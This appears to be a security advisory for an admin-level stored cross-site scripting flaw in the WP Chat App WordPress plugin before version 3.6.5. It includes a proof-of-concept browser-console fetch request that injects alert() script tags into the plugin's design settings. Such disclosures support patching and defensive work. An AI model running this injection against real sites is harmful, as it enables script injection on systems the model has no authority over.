WP Chat App < 3.6.5 - Admin+ Stored XSS

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admins to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.

PoC

1. Navigate to http://vulnerable-site.tld/wp-admin/admin.php?page=nta_whatsapp_floating_widget 2. Paste and run the following in your browser’s console: await fetch(“/wp-admin/admin-ajax.php”, { “credentials”: “include”, “headers”: { “Content-Type”: “application/x-www-form-urlencoded; charset=UTF-8” }, “body”: “title=%26lt%3Bscript%26gt%3Balert(/XSS-Text/)%26lt%3B%2Fscript%26gt%3B&isShowBtnLabel;=on&btnLabel;=%26lt%3Bscript%26gt%3Balert(/XSS/-Label/)%26lt%3B%2Fscript%26gt%3B&btnLabelWidth;=156&textColor;=%23fff&titleSize;=18&descriptionTextSize;=12&accountNameSize;=14&regularTextSize;=11&backgroundColor;=%232db742&btnPosition;=right&btnLeftDistance;=30&btnRightDistance;=30&btnBottomDistance;=30&isShowPoweredBy;=on&scrollHeight;=500&responseText;=The+team+typically+replies+in+a+few+minutes.&description;=Hi!+Click+one+of+our+member+below+to+chat+on+%3Cstrong%3EWhatsApp%3C%2Fstrong%3E&gdprContent;=Please+accept+our+%3Ca+href%3D%22https%3A%2F%2Fninjateam.org%2Fprivacy-policy%2F%22%3Eprivacy+policy%3C%2Fa%3E+first+to+start+a+conversation.&time;_symbols%5BhourSymbol%5D=h&time;_symbols%5BminSymbol%5D=m&showOnDesktop;=on&showOnMobile;=on&displayCondition;=showAllPage&action;=njt_wa_save_design_setting&nonce;=” + njt_wa[“nonce”], “method”: “POST”, “mode”: “cors” }); 3. Refresh the page, navigate to the “Design” tab, the XSS will be triggered when entering anything in either the “Widget Text” or “Widget Label Text” fields